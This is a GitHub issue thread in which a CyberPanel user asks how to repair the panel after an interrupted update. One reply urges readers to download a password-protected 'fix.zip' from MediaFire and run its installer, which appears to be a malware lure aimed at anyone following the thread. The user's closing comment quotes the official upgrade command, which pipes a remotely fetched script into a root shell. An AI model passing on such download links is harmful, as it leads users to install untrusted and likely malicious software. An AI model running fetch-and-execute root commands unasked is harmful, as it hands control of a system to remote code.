### ISSUE TITLE
Error: cannot import name 'OneClickBackups' from 'IncBackups.models' (/usr/local/CyberCP/IncBackups/models.py)

### ISSUE THREAD

**Issue by ClioSecurity** [litespeedtech/cyberpanel#1317]
we've accidentelly rebooted lsws while cyberpanel was updating. 
Now websites works bat panel itself does not display any many. 
E've the error msg:
![image](https://github.com/user-attachments/assets/d864b7d6-e09e-42eb-a6fd-5e152be1ab66)

How i can fix the panel? 

Thanks

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ClioSecurity** [comment]
Hello everyone.

we've solved the issue by running update on limux terminal with a command:

`sudo su - -c "sh <(curl https://raw.githubusercontent.com/usmannasir/cyberpanel/stable/preUpgrade.sh || wget -O - https://raw.githubusercontent.com/usmannasir/cyberpanel/stable/preUpgrade.sh)"`

as from ufficial update guide
